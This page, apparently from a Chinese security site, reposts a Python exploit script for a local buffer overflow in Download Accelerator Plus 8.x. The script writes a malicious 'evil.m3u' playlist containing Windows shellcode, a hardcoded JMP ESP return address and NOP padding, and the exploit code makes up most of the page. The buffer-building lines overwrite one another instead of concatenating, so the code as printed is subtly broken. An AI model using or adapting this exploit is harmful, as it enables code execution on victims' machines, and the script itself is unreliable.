• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day ,其中包含download accelerator,accelerator,accelerator一方通行,setaccelerator,translateaccelerator等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/python
# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]
##

from struct import pack

shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")

RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)

m3u = 'http://localhost/verify_me________________________________%s.mp3'
buf = 'A' * 14074
buf = pack('<L', RET)
buf = '\x90' * 32
buf = shellcode
m3u %= buf

fd = open('evil.m3u', 'wb')
fd.write(m3u)
fd.close()

print 'DONE, import the evil.m3u and click "Verify"'

# EoF
</div>

您可能想查找下面的文章:

  • Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day
  • Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)
  • Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

相关文章

  • MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
  • Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
  • Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day
  • minb 0.1.0 Remote Code Execution Exploit
  • Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
  • CJ Ultra Plus
  • Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
  • WFTPD Pro Server
  • Dana IRC 1.4a Remote Buffer Overflow Exploit
  • PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
    • Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
    • LoveCMS 1.6.2 Final Update Settings Remote Exploit
    • FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
    • Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities
    • Maian Recipe
    • Simple PHP Blog (SPHPBlog)
    • MS Internet Explorer Recordset Double Free Memory Exploit
    • moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
    • trixbox (langChoice) Local File Inclusion Exploit (connect-back)

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有